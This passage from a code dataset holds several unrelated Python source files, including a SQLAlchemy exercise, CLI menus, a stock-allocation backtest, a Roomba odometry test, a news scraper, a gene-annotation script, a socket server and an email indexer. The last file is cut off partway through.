SMAPE)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"601992003","text":"import sqlalchemy\nfrom pprint import pprint\n\nengine = sqlalchemy.create_engine(\"mysql+pymysql://root:pwd@localhost/sakila\")\nconnection = engine.connect()\nmetadata = sqlalchemy.MetaData()\n\ncat = sqlalchemy.Table('cat', metadata,\n\t\t\t\tsqlalchemy.Column(\"id\", sqlalchemy.Integer()),\n\t\t\t\tsqlalchemy.Column(\"name\", sqlalchemy.String(20), nullable=False),\n\t\t\t\tsqlalchemy.Column(\"age\", sqlalchemy.Float(), default=3.5),\n\t\t\t\tsqlalchemy.Column(\"alive\", sqlalchemy.Boolean(), default=True))\nmetadata.create_all(engine)\n\n","sub_path":"databases/Exercise_04A.py","file_name":"Exercise_04A.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"131333632","text":"import subprocess as sp\n\nfrom ..core import read, create, delete, update\nfrom ..utils.createCLI import createCLI\n\n\ndef add_menu(connection, cursor):\n createCLI(\"ADD MENU\", {\n 'Actor': create.preAddActor,\n 'Director': create.addDirector,\n 'Brand': create.addBrand,\n 'Channel': create.addChannel,\n 'Show': create.addShow,\n 'Product': create.addProduct,\n 'Ad': create.addProduction,\n 'Guardian': create.addGuardian\n }, connection, cursor, True)\n\n\ndef delete_menu(connection, cursor):\n createCLI(\"DELETE MENU\", {\n 'Actor': delete.deletePerson,\n 'Director': delete.deletePerson,\n 'Brand': delete.deleteBrand,\n 'Channel': delete.deleteChannel,\n 'Show': delete.deleteShow,\n 'Product': delete.deleteProduct,\n 'Ad': delete.deleteAd,\n 'Guardian': delete.deleteGuardian\n }, connection, cursor, True)\n\n\ndef read_menu(connection, cursor):\n createCLI(\"READ MENU\", {\n 'Get all Actors': read.readActors,\n 'Get all Directors': read.readDirectors,\n 'Get all Brands': read.readBrands,\n 'Get all Channels': read.readChannels,\n 'Get all Shows': read.readShows,\n 'Get all Products': read.readProducts,\n 'Get all Ads': read.readAds,\n 'Get all Guardians': read.getGuardians,\n 'Get Ad-Show Relations': read.getAdShows,\n \"Get Actor's preferred brands\": read.getActorBrands,\n \"Actors with Physical features\": read.actorsByFeatures,\n 'Average ad production cost': read.avgProduction,\n \"Maximum preferred brands\": read.maxPreferred,\n 'Partial text search for shows': read.searchShow,\n 'Partial text search for actor': read.searchActor,\n 'Get best shows for an ad': read.showsForAd,\n 'Shows with surcharge less than a value': read.surchargeLessThan,\n 'Maximum of sum of the contract money of brand': read.maxProdCost,\n 'Bill for an Ad': read.adBill,\n 'Shows list by amount': read.showList\n }, connection, cursor, True)\n\n\ndef update_menu(connection, cursor):\n createCLI(\"UPDATE MENU\", {\n 'Actor': actor_update_menu,\n 'Director': director_update_menu,\n 'Brand': brand_update_menu,\n 'Product': product_update_menu,\n 'Channel': channel_update_menu,\n 'Show': show_update_menu,\n 'Ad': ad_update_menu\n }, connection, cursor)\n\n\ndef actor_update_menu(connection, cursor):\n createCLI(\"ACTOR UPDATE MENU\", {\n 'AccountNumber': update.updateAccountNumber,\n 'Name': update.updatePersonName,\n 'Height and Weight': update.updateHeightWeight,\n 'Add preferred brand': create.addPrefers,\n 'Remove preferred brand': delete.deletePrefers\n }, connection, cursor, True)\n\n\ndef director_update_menu(connection, cursor):\n createCLI(\"DIRECTOR UPDATE MENU\", {\n 'AccountNumber': update.updateAccountNumber,\n 'Name': update.updatePersonName,\n 'Salary': update.updateSalary,\n 'Supervisor': update.updateSupervisor\n }, connection, cursor, True)\n\n\ndef brand_update_menu(connection, cursor):\n createCLI(\"BRAND UPDATE MENU\", {\n 'POC Email': update.updateBrandEmail,\n 'POC Phone': update.updateBrandPhone\n }, connection, cursor, True)\n\n\ndef product_update_menu(connection, cursor):\n createCLI(\"PRODUCT UPDATE MENU\", {\n 'Price': update.updateProductPrice,\n 'Description': update.updateProductDescription\n }, connection, cursor, True)\n\n\ndef channel_update_menu(connection, cursor):\n createCLI(\"CHANNEL UPDATE MENU\", {\n 'Base Price': update.updateBasePrice\n }, connection, cursor, True)\n\n\ndef show_update_menu(connection, cursor):\n createCLI(\"SHOW UPDATE MENU\", {\n 'Surcharge': update.updateSurcharge,\n 'Air an Ad': create.addAdinShow,\n 'Remove an Ad': delete.deleteDisplayed\n }, connection, cursor, True)\n\n\ndef ad_update_menu(connection, cursor):\n createCLI(\"AD UPDATE MENU\", {\n 'Air in a show': create.addAdinShow,\n 'Remove from a show': delete.deleteDisplayed\n }, connection, cursor, True)\n","sub_path":"app/cli/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"497277533","text":"import pandas as pd \nimport numpy as np \nfrom common import scalify, lower_bound, select_val_b4_date\nfrom .new_strategy import buy_strategy, sell_strategy, choose_n_stock, new_strategy\nfrom src.read.jq_read_data import get_index_stocks, get_latest_price, get_index_stocks_weight, get_price\n\ndef panel_to_df(panel):\n df_result = None\n for i in panel.minor_axis:\n df = panel.minor_xs(i).reset_index()\n df['stock_id'] = i\n df_result = pd.concat([df_result, df]) if df_result is not None else df\n return df_result.reset_index(drop=True)\n\ndef filter_share_dict(shareDict, stock_series):\n stock_dict = {} \n for k, v in shareDict.items():\n if k in stock_series:\n stock_dict[k] = v\n else:\n pass\n return stock_dict\n\ndef get_init_share(shareDict):\n min_ = min(list(shareDict.values()))\n sum_ = sum(list(shareDict.values())) \n for k, v in shareDict.items():\n shareDict[k] = int(v * 100 / min_)\n return shareDict\n\ndef get_init_price(stock_list, b4_date, type_='close'):\n init_price = {}\n for stock in stock_list:\n init_price[stock] = scalify(get_latest_price(stock, type_, b4_date))\n return init_price\n \ndef measure_asset_val(df4test, initPrice, date, shareDict, cash, type_):\n '''\n @df4test: same date\n '''\n \n if type_ != 'open' and type_ != 'close':\n raise ValueError ('open or close?')\n sum_ = 0\n for id_, share in shareDict.items():\n lastPrice = select_val_b4_date(df4test[df4test.stock_id==id_], date, 'date', type_)\n if lastPrice:\n sum_ += share * scalify(lastPrice)\n else:\n sum_ += share * initPrice[id_]\n sum_ += cash\n return sum_\n\ndef allocation(df_test, indicator=None, prob=None, cash=0, type_='open', num_stocks_choose=30):\n #df_test = panel_to_df(df_test)\n assetRecord = np.array([])\n hs300_weight = get_index_stocks_weight()\n shareDict = filter_share_dict(hs300_weight, df_test.stock_id.unique())\n shareDict = get_init_share(shareDict)\n init_price = get_init_price(list(shareDict.keys()), np.min(df_test.date))\n #df_full = panel_to_df(get_price(list(df_test.stock_id.unique()), fields=['close']))\n #df_full = df_full.dropna(axis=0)\n for date, df in df_test.groupby('date'):\n # measure the asset\n asset = measure_asset_val(df_test, init_price, date, shareDict, cash, type_)\n print ('Asset is', asset)\n assetRecord = np.hstack((assetRecord, asset))\n # make order\n stocks2sell = choose_n_stock(df[df.class_==0])\n invest, shareDict = sell_strategy(stocks2sell, shareDict, asset)\n cash -= invest\n stocks2buy = choose_n_stock(df[df.class_==1])\n invest, shareDict = buy_strategy(stocks2buy, shareDict, cash)\n invest, shareDict = new_strategy(df_full[df_full.date<=date], shareDict, cash)\n cash -= invest\n assert cash >= 0\n assert (np.array(list(shareDict.values()))>=0).all()\n assetRecord = np.hstack((assetRecord, asset))\n return assetRecord","sub_path":"strategy/allocation.py","file_name":"allocation.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"390528493","text":"from pywinauto.application import Application as WinApp\nfrom fixture.groups import GroupHelper\n\nclass Application:\n\n def __init__(self,target):\n self.application = WinApp(backend=\"win32\").start(target)\n self.main_window = self.application.window(title=\"Free Address Book\")\n self.main_window.wait(\"visible\")\n self.group = GroupHelper(self)\n\n def destroy(self):\n self.main_window.close()","sub_path":"fixture/aplication.py","file_name":"aplication.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"327177729","text":"# Bhavik Suthar and Ayush Petigara\n# RoombaCI\n\nimport RoombaCI_lib\nimport RPi.GPIO as GPIO\nimport sys\nimport serial\nimport time\nimport math\nfrom RoombaCI_lib import DHTurn\n\nGPIO.setmode(GPIO.BCM) # Use BCM pin numbering for GPIO\nRoomba = RoombaCI_lib.Create_2(\"/dev/ttyS0\", 115200)\n\nRoomba.WakeUp(131)\nRoomba.BlinkCleanLight()\n\nif Roomba.Available() > 0:\n\tx = Roomba.DirectRead(Roomba.Available())\n\n# Roomba Constants\nWHEEL_DIAMETER = 72 # millimeters\nWHEEL_SEPARATION = 235 # millimeters\nWHEEL_COUNTS = 508.8 # counts per revolution\nDISTANCE_CONSTANT = (WHEEL_DIAMETER * math.pi)/(WHEEL_COUNTS) # millimeters/count\nTURN_CONSTANT = (WHEEL_DIAMETER * 180)/(WHEEL_COUNTS * WHEEL_SEPARATION) # degrees/count\n\n\nl_counts_list = []\nr_counts_list = []\nangle_list = []\nx_pos_list = []\ny_pos_list = []\ndata_time_list = []\n\nfinal_distance = 0\n#angle = imu.CalculateHeading()\nangle = 0\n# Initial conditions\ndistance = 0.0 # total distance traveled (millimeters)\nx_pos = 0.0 # initial x-direction position (millimeters)\ny_pos = 0.0 # initial y-direction position (millimeters)\nforward_value = 75 # initial forward speed value (mm/s)\nspin_value = 0 # initial spin speed value (mm/s)\nbumper_byte, l_counts_current, r_counts_current, l_speed, r_speed, light_bumper = Roomba.Query(7,43,44,42,41,45) # Read new wheel counts\n\nl_counts_list.append(l_counts_current)\nr_counts_list.append(r_counts_current)\nangle_list.append(angle)\nx_pos_list.append(x_pos)\ny_pos_list.append(y_pos)\ndata_time_list.append(0.0)\n\nRoomba.Move(forward_value, spin_value)\nRoomba.StartQueryStream(7,43,44,42,41,45)\n\n\ninit_time = time.time ()\n\nwhile (time.time() - init_time < 60):\n\t\n\tif Roomba.Available() > 0:\n\t\tbumper_byte, l_counts, r_counts, l_speed, r_speed, light_bumper = Roomba.ReadQueryStream(7,43,44,42,41,45) # Read new wheel counts\n\n\t\t\t# Record the current time since the beginning of loop\n\t\tdata_time = time.time() - init_time\n\t\t\n\t\t# Calculate the count differences and correct for overflow\n\t\tdelta_l_count = (l_counts - l_counts_current)\n\t\tif delta_l_count > pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_l_count -= pow(2,16)\n\t\tif delta_l_count < -pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_l_count += pow(2,16)\n\t\tdelta_r_count = (r_counts - r_counts_current)\n\t\tif delta_r_count > pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_r_count -= pow(2,16)\n\t\tif delta_r_count < -pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_r_count += pow(2,16)\n\t\t\n\t\t# Calculate the turn angle change since the last counts\n\t\tangle_change = TURN_CONSTANT * (delta_l_count - delta_r_count) # degrees\n\t\t# Update angle of Roomba and correct for overflow\n\t\tangle += angle_change # degrees\n\t\tif angle >= 360 or angle < 0:\n\t\t\tangle = (angle % 360) # Normalize the angle value from [0,360)\n\t\t\n\t\t# Calculate the distance change since the last counts\n\t\tif delta_l_count == delta_r_count: # or if angle_change == 0\n\t\t\t# Straight Line distance\n\t\t\tdistance_change = 0.5 * DISTANCE_CONSTANT * (delta_l_count + delta_r_count) # millimeters\n\t\t\t# Total distance traveled\n\t\t\tdistance += distance_change # millimeters\n\t\telse: # Circular Arc distance\n\t\t\tdistance_radius = WHEEL_SEPARATION * ((delta_l_count/(delta_l_count - delta_r_count)) - 0.5) # millimeters\n\t\t\tdistance_change = 2 * distance_radius * math.sin(0.5 * math.radians(angle_change)) # millimeters\n\t\t\t# Total distance traveled\n\t\t\tdistance += (distance_radius * math.radians(angle_change)) # millimeters; Slightly larger than distance_change\n\t\t\n\t\t# Calculate position data\n\t\tdelta_x_pos = distance_change * math.cos(math.radians(angle - (0.5 * angle_change)))\n\t\tdelta_y_pos = distance_change * math.sin(math.radians(angle - (0.5 * angle_change)))\n\t\tx_pos += delta_x_pos\n\t\ty_pos += delta_y_pos\n\n\t\tfinal_distance = distance\n\n\n\n\t\t#appending to the lists\n\t\tl_counts_list.append(l_counts)\n\t\tr_counts_list.append(r_counts)\n\t\tangle_list.append(angle)\n\t\tx_pos_list.append(x_pos)\n\t\ty_pos_list.append(y_pos)\n\t\tdata_time_list.append(data_time)\n\n\t\tspin_value = DHTurn(angle, 0.0, 0.5) # Determine the spin speed to turn toward the desired heading\n\t\tRoomba.Move(forward_value, spin_value)\n\n\t\tl_counts_current = l_counts\n\t\tr_counts_current = r_counts\n\t#end if roomba.available > 0\n#end while loop\nRoomba.Move(0,0)\ntime.sleep(0.5)\nprint(\"Roomba GOING STRAIGHT TESTING\", file=open(\"outputStraight.txt\",\"a\"))\nprint(\"\\nL Count\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(l_counts_list)):\n\tprint(\"{:.3f}\".format(l_counts_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nR Count\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(r_counts_list)):\n\tprint(\"{:.3f}\".format(r_counts_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nAngle\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(angle_list)):\n\tprint(\"{:.3f}\".format(angle_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nX-Pos\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(x_pos_list)):\n\tprint(\"{:.3f}\".format(x_pos_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nY-Pos\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(y_pos_list)):\n\tprint(\"{:.3f}\".format(y_pos_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\t\n\nprint(\"\\nDate Time\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(data_time_list)):\n\tprint(\"{:.3f}\".format(data_time_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\t\n\nprint(\"\\nFinal Distance: \", final_distance, file=open(\"outputStraight.txt\", \"a\"))\t\t\nprint(\"\\nFinal Distance: \", final_distance)\n\nRoomba.ShutDown()\n#GPIO.cleanup()\n","sub_path":"Python_Files/Miscellaneous/test_straight.py","file_name":"test_straight.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"130834199","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom datetime import datetime, date\nimport re\nfrom newspaper import Article\n\n\nclass GuardianSpider(scrapy.Spider):\n name = 'guardian'\n allowed_domains = ['www.theguardian.com']\n start_urls = ['https://www.theguardian.com/technology/all', 'https://www.theguardian.com/uk/technology'] #internationala and uk specific site\n\n def parse(self, response):\n if 'uk/technology' in response.request.url:\n for article in response.xpath('//div[@class=\"fc-item__container\"]//a'):\n url = article.xpath('.//@href').get()\n if re.search('technology', url) and ('/video/' not in url and '/gallery/' not in url): #remove videos and galleries\n yield response.follow(url=url, callback=self.parse_article, meta={ 'url': url })\n else:\n articles = response.xpath('//div[@class=\"u-cf index-page\"]')\n for article in articles.xpath('//h3[@class=\"fc-item__title\"]//a'):\n url = article.xpath('.//@href').get()\n yield response.follow(url=url, callback=self.parse_article, meta={ 'url': url })\n\n \n \n\n\n def parse_article(self,response):\n \n url = response.request.meta['url']\n blurp =response.xpath('//div[@class=\"css-zjgnrw\"]//p//text()').get()\n tags =response.xpath('//li[@class=\"css-184iqxr\"]//a//text()').extract()\n category = response.xpath('//li[@class=\"css-blajdl\"]//a//text()').get()\n tags.append(category)\n def get_key_word(url):\n article = Article(url)\n article.download()\n\n article.html\n article.parse()\n article.nlp()\n\n return article.text, article.publish_date, article.top_image ,article.title\n \n text, article_date, imgurl ,title= get_key_word(url)\n\n #remove reviews and products \n if re.search('review', title) or re.search('best',title.lower()):\n pass \n else:\n try:\n article_date = datetime.strftime(article_date, \"%d/%m/%Y\")\n except IndexError:\n article_date = date.today()\n article_date = datetime.strftime(article_date, \"%d/%m/%Y\")\n \n\n \n\n yield {\n 'title': title,\n 'imgurl': imgurl,\n 'date': article_date,\n 'blurp' : blurp,\n 'url': url,\n 'text': text,\n 'category': category,\n 'tags':tags,\n 'source': self.name\n }","sub_path":"lambdas/src/minearticles/spiders/guardian.py","file_name":"guardian.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"533114372","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Annotate probe IDs with gene symbols \n# \n# In order to identify the genes that compounds with high MAS and low TAS influence\n\n# In[1]:\n\n\nimport pathlib\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\ntop_n_cpds = 6\nbottom_n_cpds = 2 \ngene_cut = 2\n\n\n# In[3]:\n\n\n# Load mapping resource\n# Downloaded from: http://amp.pharm.mssm.edu/public/L1000CDS_download/\nurl = \"http://amp.pharm.mssm.edu/public/L1000CDS_download/apiRowMeta.json\"\nmap_df = pd.read_json(url)\n\n# Setup a dictionary to rename the map\nupdater = dict(zip(map_df.pr_id, map_df.pr_gene_symbol))\n\nprint(map_df.shape)\nmap_df.head()\n\n\n# In[4]:\n\n\n# Load activity scores\nfile = pathlib.Path(\"../6.paper_figures/data/highmas_lowtas_compounds.tsv\")\nactivity_df = pd.read_csv(file, sep=\"\\t\")\n\nprint(activity_df.shape)\nactivity_df.head(3)\n\n\n# In[5]:\n\n\n# What are the top compounds that change lots of MAS but not TAS\ntop_cpds = activity_df.head(top_n_cpds).cpd.tolist()\ntop_cpds\n\n\n# In[6]:\n\n\n# What are the top compounds that change lots of TAS but not MAS\nbottom_cpds = activity_df.sort_values(by=\"mas_tas_dff\").head(bottom_n_cpds).cpd.tolist()\nbottom_cpds\n\n\n# In[7]:\n\n\nfocus_cps = top_cpds + bottom_cpds\n\n\n# In[8]:\n\n\n# Load L1000 data to obtain high differential genes\ndata_dir = pathlib.Path(\"../1.Data-exploration/\")\n\nfile = pathlib.Path(f\"{data_dir}/Consensus/L1000/moa_sizes_consensus_datasets/modz_level5_data.csv\")\ndf = pd.read_csv(file)\n\ndf = df.query(\"pert_iname in @focus_cps\").reset_index(drop=True)\n\nprint(df.pert_iname.value_counts())\nprint(df.shape)\ndf.head(2)\n\n\n# In[9]:\n\n\n# Obtain background gene lists\nbackground_df = pd.DataFrame(\n df.columns[df.columns.str.endswith(\"_at\")],\n columns=[\"probe\"]\n)\n\nbackground_df = background_df.assign(gene_symbol=background_df.probe.replace(updater))\n\noutput_file = pathlib.Path(\"results\", \"background_gene_list.tsv\")\nbackground_df.to_csv(output_file, sep=\"\\t\", index=False)\n\nbackground_df.head()\n\n\n# In[10]:\n\n\nexpression_df = (\n df\n .groupby([\"pert_iname\", \"moa\"])\n .median()\n .reset_index()\n .melt(\n id_vars=[\"pert_iname\", \"moa\"],\n value_vars=df.columns[df.columns.str.endswith(\"_at\")],\n value_name=\"L1000_readout\",\n var_name=\"L1000_probe\"\n )\n)\n\nexpression_df = (\n expression_df\n .assign(L1000_abs_readout = expression_df.L1000_readout.abs())\n .query(\"L1000_abs_readout > @gene_cut\")\n .sort_values(by=\"pert_iname\")\n .reset_index(drop=True)\n)\n\nexpression_df = expression_df.assign(gene_symbol=expression_df.L1000_probe.replace(updater))\n\noutput_file = pathlib.Path(\"results\", \"differential_mas_vs_tas_genes.tsv\")\nexpression_df.to_csv(output_file, sep=\"\\t\", index=False)\n\nprint(expression_df.shape)\nexpression_df.head()\n\n\n# In[11]:\n\n\n# Which genes are consistently implicated?\ngene_count_df = (\n expression_df\n .gene_symbol\n .value_counts()\n .reset_index()\n .rename({\"index\": \"gene\", \"gene_symbol\": \"cpd_count\"}, axis=\"columns\")\n)\n\ngene_count_df.head(10)\n\n","sub_path":"5.Gene-analysis/scripts/nbconverted/0.annotate-genes.py","file_name":"0.annotate-genes.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"637386814","text":"import socket\nimport sys\nimport traceback\nimport json\nimport ast\nfrom collections import OrderedDict\nfrom threading import Thread\n\n\ndef start_server():\n host = \"127.0.0.1\"\n port = 8888 # arbitrary non-privileged port\n\n soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # SO_REUSEADDR flag tells the kernel to reuse a local socket in TIME_WAIT state, without waiting for its natural timeout to expire\n print(\"Socket created\")\n\n try:\n soc.bind((host, port))\n except:\n print(\"Bind failed. Error : \" + str(sys.exc_info()))\n sys.exit()\n\n soc.listen(5) # queue up to 5 requests\n print(\"Socket now listening\")\n\n # infinite loop- do not reset for every requests\n while True:\n connection, address = soc.accept()\n ip, port = str(address[0]), str(address[1])\n print(\"Connected with \" + ip + \":\" + port)\n\n try:\n Thread(target=client_thread, args=(connection, ip, port)).start()\n except:\n print(\"Thread did not start.\")\n traceback.print_exc()\n\n soc.close()\ndef client_thread(connection, ip, port, max_buffer_size = 5120):\n is_active = True\n\n while is_active:\n client_input = receive_input(connection, max_buffer_size)\n\n if \"--QUIT--\" in client_input:\n print(\"Client is requesting to quit\")\n connection.close()\n print(\"Connection \" + ip + \":\" + port + \" closed\")\n is_active = False\n else:\n #print(client_input)\n client_input = ast.literal_eval(client_input)\n insertToRankingMemory(client_input)\n connection.sendall(\"-\".encode(\"utf8\"))\ndef receive_input(connection, max_buffer_size):\n client_input = connection.recv(max_buffer_size)\n client_input_size = sys.getsizeof(client_input)\n\n if client_input_size > max_buffer_size:\n print(\"The input size is greater than expected {}\".format(client_input_size))\n\n result = client_input.decode(\"utf8\").rstrip() # decode and strip end of line\n return result\n\n# Rank from ship_from_region for 10 minutes and previous data go to database\n# For tackling streaming data, all the data should be processed on memory\n# MongoDB query runs on memory, but memory architecture is ~~\ndef ranking_sort(updated_order):\n global top_10_region\n global top_10_region_key\n global lowest_rank\n\n new_key, new_value = None, None\n for k,v in updated_order.items():\n new_key, new_value = k, v\n top_10_region[k] = v\n a = sorted(list(top_10_region.items()), key=lambda x: x[1], reverse=True)\n print('d')\n print(a[:10])\n #TODO : IMPORVE SORTING ALGORITHM\n #\n # if len(top_10_region) == 0:\n # top_10_region[new_key] = new_value\n # top_10_region_key.append(new_key)\n # else:\n # if new_key in top_10_region:\n # top_10_region[new_key] = new_value\n # top_10_region_key.append(new_key)\n # else:\n # for key, value in top_10_region.items():\n # if value < new_value:\n\ndef insertToRankingMemory(data):\n global top_10_region\n region = str(data['ship_from_region_x'])+','+str(data['ship_from_region_y'])\n if region in top_10_region:\n order_created[region] += 1\n else:\n order_created[region] = 1\n ranking_sort({region: order_created[region]})\n\n\nclient_socket = None\norder_created = {}\ntop_10_region = OrderedDict()\n\nif __name__ == \"__main__\":\n start_server()\n\n# from flask import Flask, render_template, request\n# import requests\n# from bs4 import BeautifulSoup\n# import random\n# import socket\n# import threading\n#\n# app = Flask(__name__)\n# suggestions_list = []\n# conn = None\n#\n# def server_program():\n# global suggestions_list\n# global conn\n# print('1')\n# # get the hostname\n# host = socket.gethostname()\n# port = 5004 # initiate port no above 1024\n#\n# server_socket = socket.socket() # get instance\n# # look closely. The bind() function takes tuple as argument\n# server_socket.bind((host, port)) # bind host address and port together\n#\n# # configure how many client the server can listen simultaneously\n# server_socket.listen(2)\n# conn, address = server_socket.accept() # accept new connection\n# print(\"Connection from: \" + str(address))\n# print(conn)\n# server_program()\n#\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n#\n# @app.route('/suggestions')\n# def suggestions():\n# global suggestions_list\n# global conn\n# data = conn.recv(512).decode()\n# suggestions_list.append(str(data)+'\\n')\n# print(\"from connected user: \" + str(data))\n# return render_template('suggestions.html', suggestions=suggestions_list)\n#\n#\n# if __name__ == '__main__':\n# app.run(debug=True)","sub_path":"PycharmProjects/Delivery_Simulation_AWS_Kinesis-master/Server/Simple_Server.py","file_name":"Simple_Server.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"193196578","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\nimport sys, os\nfrom services import utils\nsys.path.append(os.getcwd())\n\nimport cPickle as pickle\nimport tokenizer\n\nclass Indexer:\n GLOSSARY = \"glossary.rgi\"\n SUBJECT = \"subject.rgi\"\n FROM = \"from.rgi\"\n BODY = \"body.rgi\"\n SEEN = \"seen.rgi\"\n CACHE = \"cache.rgi\"\n TERMS_VECTORS = \"termvectors.rgi\"\n\n GENCODE = 0\n GENCODELBL = \"\"\n \n def load(self):\n glossshlv = open(self.GLOSSARY)\n subjshlv = open(self.SUBJECT)\n fromshlv = open(self.FROM)\n bodyshlv = open(self.BODY)\n seenshlv = open(self.SEEN)\n cacheshlv = open(self.CACHE)\n vectorshlv = open(self.TERMS_VECTORS)\n \n try:\n self.__glossshlv = pickle.load(glossshlv)\n except EOFError:\n self.__glossshlv = {}\n \n try:\n self.__subjshlv = pickle.load(subjshlv)\n except EOFError:\n self.__subjshlv = {}\n try:\n self.__fromshlv = pickle.load(fromshlv)\n except EOFError:\n self.__fromshlv = {}\n try:\n self.__bodyshlv = pickle.load(bodyshlv)\n except EOFError:\n self.__bodyshlv = {}\n try:\n self.__seenshlv = pickle.load(seenshlv)\n except EOFError:\n self.__seenshlv = []\n try:\n self.__cacheshlv = pickle.load(cacheshlv)\n except EOFError:\n self.__cacheshlv = {}\n try:\n self.__vectorshlv = pickle.load(vectorshlv)\n except EOFError:\n self.__vectorshlv = {} \n \n glossshlv.close()\n subjshlv.close()\n fromshlv.close()\n bodyshlv.close()\n seenshlv.close()\n cacheshlv.close()\n vectorshlv.close()\n \n def sync(self):\n glossshlv = open(self.GLOSSARY, \"w\")\n subjshlv = open(self.SUBJECT, \"w\")\n fromshlv = open(self.FROM, \"w\")\n bodyshlv = open(self.BODY, \"w\")\n seenshlv = open(self.SEEN, \"w\")\n cacheshlv = open(self.CACHE, \"w\")\n vectorshlv = open(self.TERMS_VECTORS , \"w\")\n \n pickle.dump(self.__glossshlv, glossshlv)\n pickle.dump(self.__subjshlv, subjshlv)\n pickle.dump(self.__fromshlv, fromshlv)\n pickle.dump(self.__bodyshlv, bodyshlv)\n pickle.dump(self.__seenshlv, seenshlv)\n pickle.dump(self.__cacheshlv, cacheshlv)\n pickle.dump(self.__vectorshlv, vectorshlv)\n \n glossshlv.close()\n subjshlv.close()\n fromshlv.close()\n bodyshlv.close()\n seenshlv.close()\n cacheshlv.close()\n vectorshlv.close()\n \n def __init__(self, toIndex, init=True):\n if init:\n #create files\n glossshlv = open(self.GLOSSARY, \"w\")\n subjshlv = open(self.SUBJECT, \"w\")\n fromshlv = open(self.FROM, \"w\")\n bodyshlv = open(self.BODY, \"w\")\n seenshlv = open(self.SEEN, \"w\")\n cacheshlv = open(self.CACHE, \"w\")\n vectorshlv = open(self.TERMS_VECTORS, \"w\")\n \n glossshlv.close()\n subjshlv.close()\n fromshlv.close()\n bodyshlv.close()\n seenshlv.close()\n cacheshlv.close()\n vectorshlv.close()\n #init the dictionaries\n self.load()\n\n #index mails\n self.__seenshlv = []\n helper = {}\n for mail in toIndex:\n print(\"Indexing \" + mail.id)\n helper[mail.id] = [-1, -1 , -1]\n \n self.__cacheshlv[mail.id] = [mail.sender, mail.time,mail.subject, mail.message]\n \n self.__seenshlv.append(mail.id)\n #index sender\n tmp = tokenizer.Tokenize(mail.sender)\n helper[mail.id][0]=tmp.__len__()\n code = 0\n for token in tmp:\n if not token in self.__glossshlv:\n code = self.generateCode()\n self.__glossshlv[token] = code\n self.__fromshlv[code] = [mail.id]\n else:\n code = self.__glossshlv[token]\n if not code in self.__fromshlv:\n self.__fromshlv[code] = [mail.id]\n else:\n self.__fromshlv[code].append(mail.id) \n #index subject\n tmp = tokenizer.Tokenize(mail.subject)\n helper[mail.id][1]=tmp.__len__()\n code = 0\n for token in tmp:\n if not token in self.__glossshlv:\n code = self.generateCode()\n self.__glossshlv[token] = code\n self.__subjshlv[code] = [mail.id]\n else:\n code = self.__glossshlv[token]\n if not code in self.__subjshlv:\n self.__subjshlv[code] = [mail.id]\n else:\n self.__subjshlv[code].append(mail.id)\n #index message\n tmp = tokenizer.Tokenize(mail.message)\n helper[mail.id][2]=tmp.__len__()\n code = 0\n for token in tmp:\n if not token in self.__glossshlv:\n code = self.generateCode()\n self.__glossshlv[token] = code\n self.__bodyshlv[code] = [mail.id]\n else:\n code = self.__glossshlv[token]\n if not code in self.__bodyshlv:\n self.__bodyshlv[code] = [mail.id]\n else:\n self.__bodyshlv[code].append(mail.id)\n \n \n for mail in toIndex:\n print(\"calculating \" + mail.id)\n vect = [{}, {}, {}]\n for term in self.__glossshlv:\n code = 